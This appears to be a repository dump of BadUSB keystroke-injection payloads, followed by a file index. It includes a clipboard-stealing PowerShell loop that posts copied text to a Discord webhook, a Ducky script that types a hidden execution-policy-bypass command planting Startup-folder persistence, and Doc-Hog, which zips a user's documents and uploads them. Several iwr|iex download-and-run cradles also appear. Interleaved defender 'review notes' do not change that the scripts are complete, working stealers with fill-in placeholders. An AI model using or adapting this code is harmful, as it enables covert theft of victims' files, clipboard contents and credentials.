# Poll the keyboard state forever; the loop has no sleep, so it spins continuously.
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
# Either Ctrl key together with C or X: send the current clipboard contents.
# The condition is re-evaluated on every pass, so a held key combination triggers repeated posts.
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
# Both Ctrl keys at once: send a final marker message and end the process.
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
# Review note: a long-lived hidden powershell.exe that loaded PresentationCore/WindowsBase,
# polls without sleeping and posts to a webhook after copy/cut actions matches this script.
================================================
FILE: OMG/payloads/Copy-And-Waste/payload.txt
================================================
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
REM The typed one-liner runs PowerShell hidden with -NoP -NonI -Ep Bypass and does three things:
REM writes downloaded content to l.bat in the user's Startup folder, writes downloaded content to
REM c.ps1 in %APPDATA%, and starts c.ps1.
REM Review note: a new .bat in ...\Start Menu\Programs\Startup and a .ps1 dropped directly in
REM %APPDATA% are the on-disk persistence artifacts; both are created by powershell.exe.
REM As shown on this page, GUI and DELAY below carry no argument.
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: OMG/payloads/Copy-And-Waste/placeholder
================================================
================================================
FILE: OMG/payloads/De-Bloater/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# De-Bloater
A payload to quickly get "Windows10Debloater"
## Description
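This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more... The command below fetches the script through a `git.io` short link and pipes it straight into `iex`, so what runs is whatever that link resolves to at the time; review the script in the Sycnex repository before running it.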
## Getting Started
### Dependencies
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
iwr -useb https://git.io/debloat|iex
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
[Sycnex](https://github.com/Sycnex/Windows10Debloater)
[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: OMG/payloads/Doc-Hog/d.ps1
================================================
function Doc-Hog {
<#
.SYNOPSIS
Sends an optional text message and/or an optional file to the URL held in $hookurl.
.DESCRIPTION
Review annotation, written from the defender's side.
The function makes up to two outbound requests: a JSON POST through Invoke-RestMethod
when -text is non-empty, and a multipart form upload through curl.exe when -file is
non-empty. Both go to the same $hookurl value.
The curl.exe call is a separate child process of the PowerShell host, so it shows up in
process-creation telemetry with the -F argument and the destination on its command line.
NOTE(review): the placeholder name suggests a Discord webhook; another script in this
repository uses the form https://discord.com/api/webhooks/... - egress to that path from
hosts with no business use for it is a reasonable thing to alert on.
.PARAMETER file
Path of the file to upload. Skipped when null or empty.
.PARAMETER text
Message sent as the 'content' field of the JSON body. Skipped when null or empty.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Placeholder literal, not a URL: the real destination is whatever is substituted here.
$hookurl = 'DISCORD-WEBHOOK'
# JSON body: 'username' carries the logged-on account name from the environment,
# so every message discloses which user the script ran as.
$Body = @{
'username' = $env:username
'content' = $text
}
# Text path: one JSON POST, only when a message was supplied.
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
# File path: multipart upload of $file under the form field 'file1', done by curl.exe
# rather than by a PowerShell cmdlet.
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
# Review annotation, written from the defender's side.
# Recursively lists every file under $env:HOMEPATH whose name matches one of the ten
# document, image and text extensions below. On a real profile this is a burst of
# directory reads across the whole user tree from a single PowerShell process.
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
# Maps each wildcard to the label used for the archive name and for the status message.
# The labels are fixed, so the archive names this script can produce are limited to
# Word.zip, PowerPoint.zip, Excel.zip, PDF.zip, JPEG.zip, PNG.zip, CSV.zip and Text.zip.
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
# One pass per wildcard: pick the matching files out of the listing, and if there are any,
# pack them into <label>.zip under $env:TEMP and hand the archive to Doc-Hog for upload.
# Nothing in this script deletes the archives afterwards, so they stay in the user's
# temp directory as on-disk evidence of what was collected.
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: OMG/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
REM Review note: the URL below is a placeholder; the script it names is not part of this file.
DEFINE URL http://new-url.com/powershell.ps1
REM Target: Windows 10
DELAY 2000
REM Review note: GUI r opens the Windows Run dialog; everything after it is typed as keyboard input.
GUI r
DELAY 500
REM Review note (defender view): the typed command starts PowerShell with a hidden window (-w h),
REM no profile (-NoP), non-interactive (-NonI) and execution policy bypass (-ep Bypass), then passes
REM the result of iwr to iex, so the fetched script is run without being saved by this command.
REM That flag combination together with iwr/iex on one command line is visible in process-creation
REM logging with command lines enabled and in PowerShell script block logging.
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: OMG/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=3
gitextract_2ly3q691/
├── Assets/
│ └── placeholder
├── BashBunny/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BBB.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── FlipperZero/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Browser-Devil/
│ │ └── Browser-Devil/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ └── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
├── Functions/
│ ├── placeholder
│ └── tidal-log.ps1
├── OMG/
│ └── payloads/
│ ├── Bookmark-Hog/
│ │ ├── BH.ps1
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Browser-Grab/
│ │ ├── README.md
│ │ ├── b.ps1
│ │ └── payload.txt
│ ├── Copy-And-Waste/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── De-Bloater/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Doc-Hog/
│ │ ├── d.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── History-Pig/
│ │ ├── HP.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── OVPN-Hog/
│ │ ├── o.ps1
│ │ ├── payload.txt
│ │ └── readme.md
│ ├── Powershell-History/
│ │ ├── PH.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Printer-Recon/
│ │ ├── PR.ps1
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Priv-Paths/
│ │ ├── README.md
│ │ └── payload.txt
│ ├── Proton-Hog/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── s.ps1
│ ├── Pwn-Drive/
│ │ ├── README.md
│ │ ├── c.ps1
│ │ └── payload.txt
│ ├── RanFunWare/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── r.ps1
│ ├── Screen-Shock/
│ │ ├── I.bat
│ │ ├── README.md
│ │ ├── c.ps1
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── Spotify-Spy/
│ │ ├── README.md
│ │ ├── SS.ps1
│ │ └── payload.txt
│ ├── Water-UnMark/
│ │ ├── README.md
│ │ ├── payload.txt
│ │ └── placeholder
│ ├── cApS-Troll/
│ │ ├── README.md
│ │ ├── a.ps1
│ │ └── payload.txt
│ └── placeholder
├── README.md
└── RubberDucky/
└── payloads/
├── Bookmark-Hog/
│ ├── BH.ps1
│ ├── README.md
│ └── payload.txt
├── Browser-Grab/
│ ├── README.md
│ ├── b.ps1
│ └── payload.txt
├── Copy-And-Waste/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── De-Bloater/
│ ├── README.md
│ └── payload.txt
├── Doc-Hog/
│ ├── d.ps1
│ ├── payload.txt
│ └── readme.md
├── History-Pig/
│ ├── HP.ps1
│ ├── README.md
│ └── payload.txt
├── OVPN-Hog/
│ ├── o.ps1
│ ├── payload.txt
│ └── readme.md
├── Picture-Hog/
│ ├── p.ps1
│ └── placeholder
├── Powershell-History/
│ ├── PH.ps1
│ ├── README.md
│ └── payload.txt
├── Printer-Recon/
│ ├── PR.ps1
│ ├── README.md
│ └── payload.txt
├── Priv-Paths/
│ ├── README.md
│ └── payload.txt
├── Proton-Hog/
│ ├── README.md
│ ├── payload.txt
│ └── s.ps1
├── Pwn-Drive/
│ ├── README.md
│ ├── c.ps1
│ └── payload.txt
├── RanFunWare/
│ ├── README.md
│ ├── payload.txt
│ └── r.ps1
├── Screen-Shock/
│ ├── I.bat
│ ├── README.md
│ ├── c.ps1
│ ├── payload.txt
│ └── placeholder
├── Spotify-Spy/
│ ├── README.md
│ ├── SS.ps1
│ └── payload.txt
├── Water-UnMark/
│ ├── README.md
│ ├── payload.txt
│ └── placeholder
├── cApS-Troll/
│ ├── README.md
│ ├── a.ps1
│ └── payload.txt
└── placeholder
Condensed preview — 224 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (362K chars).
[
{
"path": "Assets/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/BBB.ps1",
"chars": 1630,
"preview": "#Bookmark-Hog\r\n\r\n# Get Drive Letter\r\n$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name\r\n\r\n# Test if directory exi"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/README.md",
"chars": 2714,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n<h1 align=\"center\">\n <a "
},
{
"path": "BashBunny/payloads/Bookmark-Hog/payload.txt",
"chars": 547,
"preview": "# Title: Bookmark-Hog\r\n# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.\r\n# Auth"
},
{
"path": "BashBunny/payloads/Bookmark-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Browser-Grab/README.md",
"chars": 3076,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "BashBunny/payloads/Browser-Grab/payload.txt",
"chars": 616,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "BashBunny/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "BashBunny/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/De-Bloater/README.md",
"chars": 2950,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "BashBunny/payloads/Doc-Hog/payload.txt",
"chars": 627,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "BashBunny/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "BashBunny/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "BashBunny/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "BashBunny/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "BashBunny/payloads/OVPN-Hog/payload.txt",
"chars": 615,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "BashBunny/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "BashBunny/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "BashBunny/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "BashBunny/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "BashBunny/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Printer-Recon/payload.txt",
"chars": 668,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "BashBunny/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Priv-Paths/payload.txt",
"chars": 715,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "BashBunny/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Proton-Hog/payload.txt",
"chars": 613,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "BashBunny/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "BashBunny/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "BashBunny/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "BashBunny/payloads/Pwn-Drive/payload.txt",
"chars": 593,
"preview": "REM Title: Pwn-Drive\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will share the entire victim"
},
{
"path": "BashBunny/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "BashBunny/payloads/RanFunWare/payload.txt",
"chars": 579,
"preview": "REM Title: RanFunWare\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will prank your target into"
},
{
"path": "BashBunny/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "BashBunny/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "BashBunny/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "BashBunny/payloads/Screen-Shock/c.ps1",
"chars": 1829,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)"
},
{
"path": "BashBunny/payloads/Screen-Shock/payload.txt",
"chars": 839,
"preview": "REM Title: Screen-Shock\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate sc"
},
{
"path": "BashBunny/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "BashBunny/payloads/Spotify-Spy/payload.txt",
"chars": 670,
"preview": "REM Title: Spotify-Spy\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate spo"
},
{
"path": "BashBunny/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "BashBunny/payloads/Water-UnMark/payload.txt",
"chars": 536,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "BashBunny/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "BashBunny/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "BashBunny/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "BashBunny/payloads/cApS-Troll/payload.txt",
"chars": 569,
"preview": "REM Title: cApS-Troll\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to prank your vict"
},
{
"path": "BashBunny/payloads/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "FlipperZero/payloads/Bookmark-Hog/payload.txt",
"chars": 327,
"preview": "REM Title: Bookmark-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate bookma"
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md",
"chars": 3139,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1",
"chars": 1090,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt",
"chars": 585,
"preview": "REM Title: Browser-Devil\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, password"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
